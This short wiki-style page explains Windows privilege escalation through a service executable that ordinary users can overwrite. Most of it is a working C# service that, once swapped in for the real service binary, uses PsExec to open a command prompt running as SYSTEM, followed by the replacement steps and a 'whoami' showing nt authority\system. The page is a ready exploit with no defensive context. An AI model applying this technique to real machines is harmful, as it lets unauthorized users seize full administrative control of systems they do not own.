Privilege escalation
From Banane Atomic
With a writable Windows service
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that launches a command prompt running under the SYSTEM account.
Program.cs

```csharp
using System.Diagnostics;
using System.ServiceProcess;
using System.Threading;

class Program
{
    static void Main(string[] args)
    {
        // Hand control to the Service Control Manager, which calls Service.OnStart.
        ServiceBase.Run(new ServiceBase[] { new Service() });
    }
}

public class Service : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        Thread.Sleep(60000);
        // Windows services run in session 0 and the user account runs in session 1.
        // Use Sysinternals' PsExec to run cmd.exe in session 1.
        Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe");
    }
}
```
- Replace the executable of the Windows service with the compiled application.
- A command prompt is launched when the Windows service starts.

whoami
REM nt authority\system